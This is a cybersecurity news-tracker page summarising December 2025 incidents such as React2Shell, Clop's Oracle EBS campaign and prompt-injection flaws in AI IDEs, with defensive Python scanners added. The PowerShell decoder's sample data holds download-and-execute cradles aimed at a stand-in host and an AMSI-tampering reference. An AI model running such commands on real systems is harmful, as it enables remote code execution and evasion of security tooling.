
Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

News Summary

Last updated: 02:00 08/12/2025 UTC
  • **30+ vulnerabilities (IDEsaster) in AI-powered IDEs enable data theft and RCE.** Researchers disclosed over 30 flaws in AI-powered IDEs, collectively dubbed IDEsaster, that allow data exfiltration and remote code execution. The bugs chain prompt injection primitives with legitimate IDE features and affect Cursor, GitHub Copilot, Zed.dev, and others, exposing developers and enterprises to supply-chain risk through compromised development tools.
  • **$25M academic cheating network tied to Kremlin-linked oligarch and drone production.** A large-scale essay mill (Nerdify, Geekly Hub) generating nearly $25M in revenue has been linked to Synergy University, Russia’s largest private university, which develops combat drones for Russia’s war against Ukraine. The network evades Google Ads bans through rebranding and front companies and has ties to Kremlin propaganda actors and a sanctioned oligarch.
  • **Portugal enacts legal safe harbor for security researchers.** Portugal amended its cybercrime law to add Article 8.º-A, granting legal protection to good-faith security research under strict conditions: no economic gain beyond professional compensation, immediate vulnerability disclosure, and ethical research practices. The move aligns Portugal with frameworks in Germany and the U.S. and reduces the legal risk of critical security work.
Last updated: 00:01 08/12/2025 UTC
  • **Clop extortion campaign expands with University of Phoenix breach via Oracle EBS zero-day.** The Clop ransomware gang has escalated its Oracle E-Business Suite (EBS) extortion campaign, breaching the University of Phoenix by exploiting the zero-day CVE-2025-61882. Disclosed on December 3, 2025, the breach exposed names, Social Security numbers, and bank details of students, staff, and suppliers. It follows 100+ organizations victimized since August 2025, including Harvard, Logitech, and The Washington Post, many facing terabytes of leaked data. Oracle’s October patch arrived after mass exploitation had already begun, and CISA and the NCSC urge immediate mitigation. Takeaway: the campaign’s scale and focus on data exfiltration make patching Oracle EBS and monitoring Clop’s leak site urgent.
  • **Aisuru botnet shatters DDoS records with 29.7 Tbps assault, targets U.S. ISPs and Azure.** The Aisuru botnet set a new DDoS record with a 29.7 Tbps attack in Q3 2025, alongside a 14.1 billion-packet-per-second (Bpps) assault, both mitigated by Cloudflare. Hyper-volumetric attacks (above 1 Tbps) surged 227% quarter over quarter and now account for 45% of Aisuru’s activity. The botnet, which commands 1 to 4 million IoT devices (routers, cameras), has expanded beyond gaming to telecom, financial services, AI, and automotive targets, with collateral damage disrupting uninvolved U.S. ISPs such as AT&T and Comcast. Urgent action: enforce DDoS protections and monitor Aisuru’s evolving infrastructure, which is absorbing devices from dismantled botnets such as Eleven11/RapperBot.
  • **Active exploitation of Elementor King Addons zero-day grants admin access to 10K+ WordPress sites.** A critical zero-day (CVE-2025-8489, CVSS 9.8) in the Elementor King Addons plugin, used by 10,000+ WordPress sites, is under mass exploitation. Attackers abuse a flawed registration handler to create rogue administrator accounts through crafted `admin-ajax.php` requests, bypassing authentication. Wordfence has blocked 48,400+ exploit attempts since late October, peaking on November 9 and 10, with 28,900 attempts from 45.61.157.120 alone. Immediate steps: update to v51.1.35 or later, audit for unauthorized administrator accounts, and block the offending IPs listed in Wordfence’s advisory.
  • **Shai-Hulud worm’s second wave infects 800+ npm packages, leaks 400K secrets.** The Shai-Hulud worm has resurfaced in a second, more aggressive wave, compromising 800+ npm packages (up from 187) and leaking 400,000 raw secrets, including GitHub tokens, AWS keys, and Slack webhooks, across 30,000 GitHub repositories. The malware now self-replicates via the Bun runtime, evades detection with split-file obfuscation, and wipes the victim’s home directory if persistence fails. Wiz researchers confirm that 60% of the leaked npm tokens remained valid as of December 1, a live supply-chain risk to downstream projects. Mitigation: rotate all credentials, audit dependencies, and remove compromised packages, especially @postman/[email protected] and @asyncapi/[email protected], which account for 60% of infections.
  • **Silver Fox deploys ValleyRAT via Microsoft Teams lures, exploits signed WatchDog driver.** The Silver Fox APT (aka SwimSnake) is targeting Chinese organizations in a false-flag operation that mimics Russian threat actors. The campaign uses Microsoft Teams lures to deliver ValleyRAT (Winos 4.0) through a trojanized installer ("MSTчamsSetup.zip") hosted on Alibaba Cloud. The attackers abuse a vulnerable, Microsoft-signed WatchDog driver (amsdk.sys) to disable EDR tools and gain persistence, scanning for 360 Total Security processes and modifying Defender exclusions. Defense: block the Alibaba Cloud URL, monitor for rundll32.exe injecting AutoRecoverDat.dll, and revoke the abused WatchDog driver.
  • **DragonForce ransomware cartel partners with Scattered Spider, intensifies high-profile attacks.** The DragonForce ransomware cartel, a Conti offshoot, has scaled operations by recruiting affiliates and partnering with Scattered Spider for high-impact breaches, including the Marks & Spencer incident. The group offers affiliates 80% profit shares, custom encryptors, and infrastructure support, lowering the barrier for new cybercriminals. Scattered Spider’s tactics (MFA fatigue, SIM swapping, and RMM tool abuse) enable lateral movement and data exfiltration, and victims’ details are being published at a higher rate than in 2024. Proactive measures: enforce network segmentation, least-privilege access, and MFA hardening to counter DragonForce’s evolving TTPs.
  • **Critical ShadowMQ flaws in AI inference frameworks enable remote code execution.** Researchers uncovered ShadowMQ vulnerabilities in AI inference engines from Meta, Nvidia, Microsoft, and PyTorch that allow remote code execution through unsafe ZeroMQ transport combined with pickle deserialization. Affected frameworks include Llama, TensorRT-LLM, vLLM, and SGLang; some have patches available and others remain exposed. Separately, Picklescan, a tool for detecting malicious pickle files, was found to have three critical flaws (fixed in v0.0.31) that let attackers bypass its checks and mount supply-chain attacks. Action items: update vulnerable frameworks, audit the sources of PyTorch models, and isolate AI inference environments to limit blast radius.

Latest updates


OpenAI considers memory-based ads for ChatGPT

Updated: 07.12.2025 22:51 · First: 01.11.2025 22:00 · 📰 3 src / 5 articles

OpenAI, valued at $500 billion, is exploring the introduction of ads on ChatGPT to address revenue challenges. The company, which has 800 million users, relies heavily on a small percentage of paying customers for its $13 billion revenue. OpenAI is debating this move ahead of a potential public offering, as it seeks to diversify its revenue streams. OpenAI has also expanded the availability of its cheaper 'Go' subscription plan to more countries and introduced purchasable credits for Codex and Sora. OpenAI has denied reports of rolling out ads on ChatGPT paid plans, clarifying that the recommendations are app suggestions from pilot partners. The company aims to make app suggestions appear more organic within ChatGPT.

Portugal Updates Cybercrime Law to Exempt Security Researchers

Updated: · First: 07.12.2025 17:09 · 📰 1 src / 1 articles

Portugal has amended its cybercrime law to provide legal protection for good-faith security research. The new provisions in Article 8.º-A, titled "Acts not punishable due to public interest in cybersecurity," exempt security researchers from criminal liability under strict conditions: the purpose must be identifying vulnerabilities, the researcher must not seek economic benefit beyond professional compensation, findings must be reported immediately, and ethical research practices must be followed. The law also specifies prohibited techniques and data handling requirements. The update aligns Portugal with similar legal frameworks in Germany and the U.S., recognizing the importance of security research in improving cybersecurity.

Critical React Server Components (RSC) Bugs Enable Unauthenticated Remote Code Execution

Updated: 06.12.2025 21:07 · First: 03.12.2025 20:19 · 📰 6 src / 10 articles

A critical vulnerability (CVE-2025-55182, CVSS 10.0) in React Server Components (RSC) allows unauthenticated remote code execution through insecure deserialization of payloads in the Flight protocol, which React uses to communicate between server and client. The flaw affects versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 of react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack; the patched releases are 19.0.1, 19.1.2, and 19.2.1. Downstream frameworks impacted include Next.js, React Router, Waku, Parcel, Vite, and RedwoodSDK. React servers that expose React Server Function endpoints are vulnerable, and Next.js is vulnerable in its default configuration, with a reported exploitation success rate of nearly 100% in default setups. Although the issue has been patched, 39% of cloud environments remain vulnerable, and Censys identified about 2.15 million internet-facing instances potentially affected.

Security researcher Lachlan Davidson reported the vulnerability to the Meta team on November 29, 2025. It has been dubbed React2Shell, a nod to the Log4Shell vulnerability of 2021. The US National Vulnerability Database (NVD) rejected CVE-2025-66478 as a duplicate of CVE-2025-55182. Davidson released multiple proof-of-concept (PoC) exploits, and Taiwanese researcher maple3142 published a working PoC on GitHub that OX Security verified; OX Security warned on December 5 at around 10:00 GMT that the flaw was actively exploitable. JFrog identified fake PoCs on GitHub and warned security teams to verify sources before testing.

Cloudflare began investigating issues on December 5 at 08:56 UTC after an emergency patch for the vulnerability caused a widespread outage; a fix was rolled out within half an hour, but by then outages had been reported by several major internet services, including Zoom, LinkedIn, Coinbase, DoorDash, and Canva. Google Cloud, AWS, and Cloudflare all responded to the vulnerability immediately.

Early reports on December 5, 2025 could not confirm active exploitation, but observed exploitation activity was reported the same day. Amazon reported attack attempts from the Chinese hacking groups Earth Lamia and Jackpot Panda within hours of public disclosure, and Coalition, Fastly, GreyNoise, VulnCheck, and Wiz also observed exploitation efforts, including the deployment of cryptocurrency miners and the execution of "cheap math" PowerShell commands. Palo Alto Networks Unit 42 confirmed over 30 compromised organizations across numerous sectors, with activity consistent with the Chinese group UNC5174. NHS England National CSOC warned that exploitation in the wild is likely to continue. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on December 6, 2025, following confirmed active exploitation, and Federal Civilian Executive Branch (FCEB) agencies have until December 26, 2025 to apply the updates. Over 77,000 internet-exposed IP addresses remain vulnerable to the flaw.
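Because the three react-server-dom packages are usually pulled in transitively by a framework rather than listed in package.json, the quickest inventory check is to walk the lock file. The following is an added example, not code from the React project, Meta, or any vendor named above: it reads a package-lock.json (both the nested v1 layout and the flat v2/v3 layout), finds every installed copy of the affected packages, and classifies each against the version lists given above. The lock-file content at the bottom is constructed, and the canary version string in it is made up for illustration.

```python
"""Scan an npm package-lock.json for the React Server Components packages
affected by CVE-2025-55182 (React2Shell).

Added example; not code from the React project, Meta, or any vendor named
above. Affected packages, vulnerable versions and fix releases come from the
advisory summary above; the lock-file content at the bottom is constructed.
"""
import json
import re
from typing import Iterator

AFFECTED_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
}
# "19.0" in the advisory is 19.0.0 as a lock file records it.
VULNERABLE_VERSIONS = {"19.0.0", "19.1.0", "19.1.1", "19.2.0"}
# First fixed patch release per 19.x minor series: 19.0.1, 19.1.2, 19.2.1.
FIXED_PATCH = {0: 1, 1: 2, 2: 1}

_SEMVER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?$")


def classify(name: str, version: str) -> str:
    """Return 'vulnerable', 'patched', 'unaffected' or 'review' for one entry."""
    if name not in AFFECTED_PACKAGES:
        return "unaffected"
    if version in VULNERABLE_VERSIONS:
        return "vulnerable"
    m = _SEMVER.match(version)
    if not m:
        return "review"  # ranges, git URLs, tags: resolve by hand
    major, minor, patch = int(m[1]), int(m[2]), int(m[3])
    if major < 19:
        return "unaffected"  # the affected range starts at 19.0
    if major == 19 and minor in FIXED_PATCH and m[4] is None:
        return "patched" if patch >= FIXED_PATCH[minor] else "vulnerable"
    # Canary/prerelease builds and minors the advisory does not list.
    return "review"


def _walk(lock: dict) -> Iterator[tuple[str, str, str]]:
    """Yield (install path, package name, version) for every locked package."""
    packages = lock.get("packages")
    if packages is not None:  # lockfileVersion 2 and 3: flat map keyed by path
        for path, meta in packages.items():
            if not path:  # "" is the root project itself
                continue
            name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
            yield path, name, str(meta.get("version", ""))
        return

    def recurse(deps: dict, prefix: str) -> Iterator[tuple[str, str, str]]:
        for name, meta in deps.items():  # lockfileVersion 1 nests "dependencies"
            path = f"{prefix}node_modules/{name}"
            yield path, name, str(meta.get("version", ""))
            yield from recurse(meta.get("dependencies", {}), path + "/")

    yield from recurse(lock.get("dependencies", {}), "")


def scan_lock(lock: dict) -> list[dict]:
    """Every affected package in the lock with its status, sorted by install
    path, so nested copies under other dependencies are not missed."""
    findings = [
        {"path": p, "name": n, "version": v, "status": classify(n, v)}
        for p, n, v in _walk(lock)
        if n in AFFECTED_PACKAGES
    ]
    return sorted(findings, key=lambda f: f["path"])


def scan_lock_text(text: str) -> list[dict]:
    return scan_lock(json.loads(text))


# Constructed lock file: one vulnerable copy, one patched nested copy, one
# canary build that needs a human look, and plain "react", which is not listed.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/react": {"version": "19.2.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
        "node_modules/admin-ui/node_modules/react-server-dom-turbopack": {"version": "19.2.1"},
        "node_modules/react-server-dom-parcel": {"version": "19.3.0-canary-abc123"},
    },
})

if __name__ == "__main__":
    for f in scan_lock_text(SAMPLE_LOCK):
        print(f"{f['status']:<10} {f['name']}@{f['version']}  ({f['path']})")
```

Run it against `package-lock.json` in each deployed application, not just the repositories you know about; a nested copy under another dependency is still loaded at runtime, which is why the scanner reports the install path rather than collapsing duplicates. Anything reported as "review" (prerelease or canary builds, or a minor series the advisory does not list) should be resolved against the vendor advisory by hand rather than assumed safe.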
Shadowserver detected 77,664 IP addresses vulnerable to the React2Shell flaw, approximately 23,700 of them in the United States. GreyNoise recorded 181 distinct IP addresses attempting to exploit the flaw within a single 24-hour window, with most of the traffic appearing automated. Attackers frequently begin with a PowerShell command that performs a basic arithmetic operation to confirm the device is vulnerable to remote code execution. Once confirmed, they execute base64-encoded PowerShell commands that download additional scripts directly into memory. One observed command fetches a second-stage PowerShell script from an external host (23[.]235[.]188[.]3) that disables AMSI to evade endpoint security and deploys additional payloads; the script GreyNoise observed installs a Cobalt Strike beacon, giving the threat actors a foothold on the network. Amazon's AWS threat intelligence teams saw exploitation within hours of the disclosure of CVE-2025-55182 from infrastructure associated with the China-linked APT groups Earth Lamia and Jackpot Panda. Palo Alto Networks observed similar exploitation and attributed some of it to UNC5174, a Chinese state-sponsored actor believed to be tied to the Ministry of State Security. The malware deployed in these attacks includes Snowlight and Vshell, both commonly used by Chinese groups for remote access, post-exploitation, and lateral movement through a compromised network.
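The chain described above (an arithmetic probe, then an encoded PowerShell download cradle, then AMSI tampering) is visible in process-creation telemetry if the encoded command is decoded rather than matched as an opaque blob. The following is an added detection example, not GreyNoise's own logic or any vendor's code: it pulls the -EncodedCommand payload out of a command line, decodes it (UTF-16LE, base64, as powershell.exe expects), and tags the stages. The command lines and the 203.0.113.10 address are constructed, and the AMSI sample only references the class name rather than a working bypass.

```python
"""Decode PowerShell -EncodedCommand payloads from process command lines and
tag the stages described above: a 'cheap math' probe, an in-memory download
cradle, and AMSI tampering.

Added example; not GreyNoise's detection logic or any vendor's code. The
command lines below are constructed (203.0.113.10 is a documentation address),
built by encoding plaintext the same way an attacker's launcher would.
"""
import base64
import binascii
import re
from typing import List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand: -e, -ec, -enc ...
# (-ExecutionPolicy also starts with -e, so the prefix must stop at 'c' or 'n').
_ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_MATH_PROBE = re.compile(r"^\(?\s*\d+\s*[-+*/%]\s*\d+\s*\)?;?$")
_CRADLE_EXEC = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
_CRADLE_FETCH = re.compile(
    r"\b(?:downloadstring|downloadfile|invoke-webrequest|iwr|invoke-restmethod|irm|net\.webclient)\b",
    re.IGNORECASE,
)
_AMSI = re.compile(r"amsiutils|amsiinitfailed|amsiscanbuffer|amsicontext", re.IGNORECASE)
_URL = re.compile(r"https?://[^\s'\")\]]+", re.IGNORECASE)


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None  # not real base64 / not UTF-16: leave for manual review


def classify_script(script: str) -> List[str]:
    """Tags for the stages seen in the React2Shell intrusions; empty for benign scripts."""
    tags = set()
    if _MATH_PROBE.match(script.strip()):
        tags.add("math-probe")          # bare arithmetic: the RCE confirmation step
    if _CRADLE_EXEC.search(script) and _CRADLE_FETCH.search(script):
        tags.add("download-cradle")     # fetch + execute in memory, no file on disk
    if _AMSI.search(script):
        tags.add("amsi-tamper")         # touches AMSI internals before stage two
    return sorted(tags)


def analyze_commandline(cmdline: str) -> Optional[dict]:
    script = decode_encoded_command(cmdline)
    if script is None:
        return None
    return {"decoded": script, "tags": classify_script(script), "urls": _URL.findall(script)}


def triage(cmdlines: List[str]) -> List[Optional[dict]]:
    """One result per input line (None when the line has no encoded command)."""
    return [analyze_commandline(c) for c in cmdlines]


# Constructed process-creation command lines (the CommandLine field of an EDR/Sysmon event).
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -e " + encode_ps("1337*2"),
    "powershell.exe -nop -w hidden -ExecutionPolicy Bypass -enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')"),
    "powershell.exe -enc " + encode_ps(
        "$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');"
        "IEX (IWR http://203.0.113.10/stage2.ps1)"
    ),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe -EncodedCommand " + encode_ps("Get-Service | Where-Object Status -eq 'Running'"),
]

if __name__ == "__main__":
    for cmd, result in zip(SAMPLE_COMMAND_LINES, triage(SAMPLE_COMMAND_LINES)):
        if result is None:
            print(f"no encoded command: {cmd[:60]}")
        else:
            print(f"{result['tags'] or ['benign']} urls={result['urls']} :: {result['decoded'][:70]}")
```

The probe pattern is the useful early signal: a web server process spawning PowerShell whose only payload is an arithmetic expression has no legitimate reason to exist, and it precedes the cradle. Feed the extracted URLs into blocklists and the decoded text into your existing script-content rules; the base64 layer alone is what defeats naive command-line matching.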

Multiple Vulnerabilities in AI-Powered IDEs Enable Data Theft and RCE

Updated: · First: 06.12.2025 17:24 · 📰 1 src / 1 articles

Over 30 vulnerabilities, collectively named IDEsaster, have been disclosed in various AI-powered Integrated Development Environments (IDEs). These flaws allow data exfiltration and remote code execution by chaining prompt injection primitives with legitimate IDE features. The affected IDEs include Cursor, Windsurf, Kiro.dev, GitHub Copilot, Zed.dev, Roo Code, Junie, and Cline. The vulnerabilities exploit the interaction between AI agents and IDE features, leading to significant security risks for developers and enterprises using these tools.

Increased Scanning Activity on Palo Alto Networks Login Portals

Updated: 06.12.2025 17:18 · First: 04.10.2025 13:39 · 📰 5 src / 7 articles

On October 3, 2025, a significant increase in scanning activity targeting Palo Alto Networks login portals was observed: 1,300 unique IP addresses, 91% classified as suspicious and 7% as malicious, geolocated primarily in the U.S. with smaller clusters in the U.K., the Netherlands, Canada, and Russia. The scans were directed at Palo Alto GlobalProtect and PAN-OS profiles, indicating targeted reconnaissance. The surge shared characteristics with recent scanning against Cisco ASA devices that was followed by the disclosure of zero-day vulnerabilities, and is likely part of a broader pattern of malicious activity against network security appliances. Palo Alto Networks customers were advised to ensure they run the latest software versions. Separately, exploitation attempts against an old path traversal vulnerability in Grafana increased, with 110 unique malicious IPs, most from Bangladesh, launching attacks on September 28, 2025. GreyNoise said it would continue monitoring the activity in case it preceded a new Palo Alto vulnerability disclosure. Security products remain a popular target: the Akira ransomware group has increased attacks on SonicWall SSL VPN appliances, and threat actors are using AI to enhance existing tactics, techniques, and procedures (TTPs) in victim reconnaissance, vulnerability research, and exploit development.

In November, malicious scanning against GlobalProtect VPN login portals rose 40-fold within 24 hours, indicating a coordinated campaign. Activity began climbing on November 14 and reached its highest level in 90 days within a week. The primary ASN in these attacks was AS200373 (3xK Tech GmbH), with 62% of the IPs geolocated to Germany and 15% to Canada; a second ASN, AS208885 (Noyobzoda Faridduni Saidilhom), was also involved. Between November 14 and 19, GreyNoise observed 2.3 million sessions hitting the */global-protect/login.esp URI on PAN-OS and GlobalProtect, the endpoint a Palo Alto Networks firewall running GlobalProtect exposes for VPN users to authenticate. Login attempts were aimed mainly at the United States, Mexico, and Pakistan, in similar volumes. GreyNoise has previously stressed blocking these attempts and tracking them as malicious probes rather than dismissing them as failed exploitation of long-patched flaws: by its statistics, such scanning spikes precede the disclosure of new security flaws in 80% of cases, and the correlation is stronger still for Palo Alto Networks products. Earlier in 2025, in February, Palo Alto Networks flaws saw two cases of active exploitation, involving CVE-2025-0108, which was later chained with CVE-2025-0111 and CVE-2024-9474.

A new wave of login attempts against GlobalProtect portals began on December 2, 2025, originating from more than 7,000 IP addresses on infrastructure operated by the German IT company 3xK Tech GmbH (AS200373). The actor started with brute-force and login attempts against GlobalProtect portals and then pivoted to scanning SonicWall API endpoints; on December 3 the same three fingerprints appeared in scanning of the SonicWall SonicOS API, and GreyNoise attributes both activities to the same actor based on the analyzed indicators.

Palo Alto Networks confirmed that the increased scanning against GlobalProtect interfaces represents credential-based attacks, not exploitation of a software vulnerability, and recommends that customers enforce multi-factor authentication (MFA) to protect against credential abuse.
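Since the portal traffic above is credential-based rather than an exploit, the detection that matters is on authentication outcomes, not request signatures. The following is an added triage example, not code from GreyNoise or Palo Alto Networks. It assumes the portal's authentication attempts can be exported as timestamp,src_ip,username,result rows (a layout assumed for the example, not a PAN-OS log format); the events are constructed from documentation address ranges. It flags the three patterns a spray leaves behind: one host failing against many accounts, many hosts sharing one target account (which per-IP thresholds miss), and a success that follows a run of failures, which is the case MFA enforcement is meant to stop.

```python
"""Triage exported VPN-portal authentication events for credential-based attack
patterns. Added example, not code from GreyNoise or Palo Alto Networks. It assumes
attempts exported as CSV columns timestamp,src_ip,username,result (an assumed
layout, not a PAN-OS log format); the events at the bottom are constructed."""
import csv
import io
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    src_ip: str
    username: str
    success: bool


def parse_events(text: str) -> list:
    events = [AuthEvent(ts=datetime.strptime(r["timestamp"].strip(), "%Y-%m-%dT%H:%M:%SZ"),
                        src_ip=r["src_ip"].strip(), username=r["username"].strip().lower(),
                        success=r["result"].strip().lower() == "success")
              for r in csv.DictReader(io.StringIO(text))]
    return sorted(events, key=lambda e: e.ts)  # everything below relies on time order


def _max_in_window(times, window):
    """Largest number of sorted timestamps that fit in one window-sized span."""
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def spraying_sources(events, window=timedelta(minutes=10), min_failures=20, min_users=5):
    """Source IPs that fail against many distinct usernames in a short burst."""
    by_ip = defaultdict(list)
    for e in events:
        if not e.success:
            by_ip[e.src_ip].append(e)
    flagged = []
    for ip, evs in by_ip.items():
        burst = _max_in_window([e.ts for e in evs], window)
        users = {e.username for e in evs}
        if burst >= min_failures and len(users) >= min_users:
            flagged.append({"src_ip": ip, "failures_in_window": burst, "distinct_users": len(users)})
    return sorted(flagged, key=lambda f: -f["failures_in_window"])


def targeted_accounts(events, window=timedelta(minutes=10), min_ips=5):
    """Usernames hit from many source IPs at once: a distributed spray that
    per-IP thresholds miss because each address tries only once or twice."""
    by_user = defaultdict(list)
    for e in events:
        if not e.success:
            by_user[e.username].append(e)
    flagged = []
    for user, evs in by_user.items():
        ips = {e.src_ip for e in evs}
        if len(ips) >= min_ips and _max_in_window([e.ts for e in evs], window) >= min_ips:
            flagged.append({"username": user, "distinct_ips": len(ips)})
    return sorted(flagged, key=lambda f: -f["distinct_ips"])


def suspicious_successes(events, window=timedelta(minutes=10), min_prior_failures=3):
    """Successes from an IP that had just failed repeatedly: lock and re-verify
    these accounts first; this is the login MFA enforcement is meant to stop."""
    recent, flagged = defaultdict(list), []
    for e in events:
        fails = recent[e.src_ip]
        if e.success:
            prior = sum(1 for t in fails if e.ts - t <= window)
            if prior >= min_prior_failures:
                flagged.append({"src_ip": e.src_ip, "username": e.username, "prior_failures": prior})
        else:
            fails.append(e.ts)
    return flagged


def _build_sample() -> str:
    """Constructed: one sprayer (30 accounts in two minutes, then one success),
    eight hosts sharing one target account, and a real user who mistypes twice."""
    base = datetime(2025, 12, 2, 3, 0, 0)
    rows = ["timestamp,src_ip,username,result"]

    def add(t, ip, user, res):
        rows.append(f"{t:%Y-%m-%dT%H:%M:%SZ},{ip},{user},{res}")

    for i in range(30):
        add(base + timedelta(seconds=4 * i), "198.51.100.7", f"user{i:02d}", "failure")
    add(base + timedelta(minutes=2, seconds=30), "198.51.100.7", "user17", "success")
    for i in range(8):
        add(base + timedelta(seconds=40 * i), f"203.0.113.{10 + i}", "admin", "failure")
    add(base + timedelta(minutes=1), "192.0.2.44", "jdoe", "failure")
    add(base + timedelta(minutes=1, seconds=20), "192.0.2.44", "jdoe", "failure")
    add(base + timedelta(minutes=1, seconds=45), "192.0.2.44", "jdoe", "success")
    return "\n".join(rows) + "\n"


SAMPLE_CSV = _build_sample()

if __name__ == "__main__":
    ev = parse_events(SAMPLE_CSV)
    print("spraying sources:", spraying_sources(ev))
    print("targeted accounts:", targeted_accounts(ev))
    print("successes after failures:", suspicious_successes(ev))
```

The thresholds are starting points to tune against your own baseline of failed logins; the distributed case (`targeted_accounts`) is the one worth keeping even at low volumes, because a campaign spread across thousands of addresses such as the one described above produces only a handful of failures per IP. Any hit from `suspicious_successes` against an account without MFA enforced is an incident, not an alert.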

Nerdify Essay Mill Linked to Russian University and Drone Production

Updated: · First: 06.12.2025 16:45 · 📰 1 src / 1 articles

A sprawling academic cheating network, generating nearly $25 million in revenue, has been linked to a Kremlin-connected oligarch and Russia’s largest private university, Synergy. The network, operating under brands like Nerdify and Geekly Hub, uses Google Ads to promote its services, despite Google’s policies prohibiting such ads. The operation has ties to Synergy University, which is involved in developing combat drones for Russia’s war against Ukraine. The essay mill network has been rebranded multiple times, with new entities and front-persons, primarily young Ukrainian women, to evade Google’s ad restrictions. The network’s operations are linked to individuals with connections to Russian propaganda efforts and the Kremlin.

FBI Warns of Virtual Kidnapping Scams Using Altered Social Media Photos

Updated: · First: 05.12.2025 18:37 · 📰 1 src / 1 articles

The FBI has issued a warning about virtual kidnapping scams where criminals use altered social media photos as fake proof of life to extort ransom payments. These scams involve contacting victims via text message, claiming to have kidnapped a family member and demanding immediate payment. The criminals use manipulated images and publicly available information to create convincing but false scenarios. The FBI advises caution and recommends establishing a family code word and verifying communications before paying any ransom.

Critical XXE Vulnerability in Apache Tika (CVE-2025-66516)

Updated: · First: 05.12.2025 18:23 · 📰 1 src / 1 articles

A critical XML External Entity (XXE) injection vulnerability (CVE-2025-66516) has been disclosed in Apache Tika, affecting multiple modules. The flaw, rated 10.0 on the CVSS scale, allows XXE attacks through crafted XFA forms embedded in PDFs. It affects specific versions of tika-core, tika-parser-pdf-module, and tika-parsers, and users are advised to upgrade to the patched versions immediately. The issue is similar to CVE-2025-54988 but widens the set of affected packages, which is why both tika-parser-pdf-module and tika-core must be upgraded to mitigate the risk.

Continuous Attack Surface Visibility Critical for Modern Security

Updated: · First: 05.12.2025 17:00 · 📰 1 src / 1 articles

Modern security teams face challenges with traditional passive internet-scan data, which quickly becomes outdated due to dynamic cloud environments and rapid deployment cycles. Continuous, automated, active reconnaissance is essential for maintaining an accurate view of the external attack surface. This approach helps detect newly exposed services, misconfigurations, and shadow IT, reducing alert fatigue and improving decision-making.

EU fines X €120 million for DSA violations related to blue checkmarks and transparency

Updated: · First: 05.12.2025 16:41 · 📰 1 src / 1 articles

The European Commission fined X €120 million ($140 million) for violating the Digital Services Act (DSA) due to deceptive blue checkmarks, opaque advertising practices, and blocking researchers' access to public data. The fine follows a two-year investigation into X's compliance with DSA obligations regarding harmful content and information manipulation. The commission found that X's blue checkmark system misleads users by allowing purchases without meaningful identity verification, increasing exposure to fraud and manipulation. Additionally, X failed to maintain a transparent advertising repository and imposed barriers on researchers accessing public data. X has 60 days to address the blue checkmark issue and 90 days to submit action plans for the other violations, with potential periodic penalties for non-compliance.

Brickstorm Malware Used in Long-Term Espionage Against U.S. Organizations

Updated: 05.12.2025 16:30 · First: 24.09.2025 17:00 · 📰 10 src / 10 articles

BRICKSTORM, a Go-based backdoor attributed to PRC state-sponsored actors, has been used for long-term espionage against U.S. organizations, particularly in the technology, legal, SaaS, and business process outsourcing (BPO) sectors, with an average dwell time of 393 days. It targets appliances without EDR support, such as VMware vCenter and ESXi, and hides its C2 communications in legitimate-looking traffic. The malware functions as a web server, file manipulator, dropper, SOCKS relay, and shell command executor, and the operators remove it after an operation to hinder forensic investigation. BRICKSTORM was first documented by Google Mandiant in 2024 in attacks linked to zero-day exploitation of Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887). Its use has been attributed to the cluster UNC5221 and to a China-nexus adversary that CrowdStrike tracks as Warp Panda.

In September 2025, Mandiant and Google Threat Intelligence Group (GTIG) reported that UNC5221 and closely related clusters were delivering BRICKSTORM to legal services firms, SaaS providers, BPOs, and technology companies in the U.S. The attackers deploy a malicious Java Servlet Filter (BRICKSTEAL) on vCenter to capture credentials and clone Windows Server VMs to extract secrets. The stolen credentials support lateral movement and persistence, including enabling SSH on ESXi and modifying startup scripts. Email is exfiltrated via Microsoft Entra ID Enterprise Apps, and the backdoor's SOCKS proxy is used to tunnel into internal systems and code repositories. UNC5221 focuses on developers, administrators, and individuals tied to China's economic and security interests. Mandiant has released a free scanner script to help defenders detect BRICKSTORM.

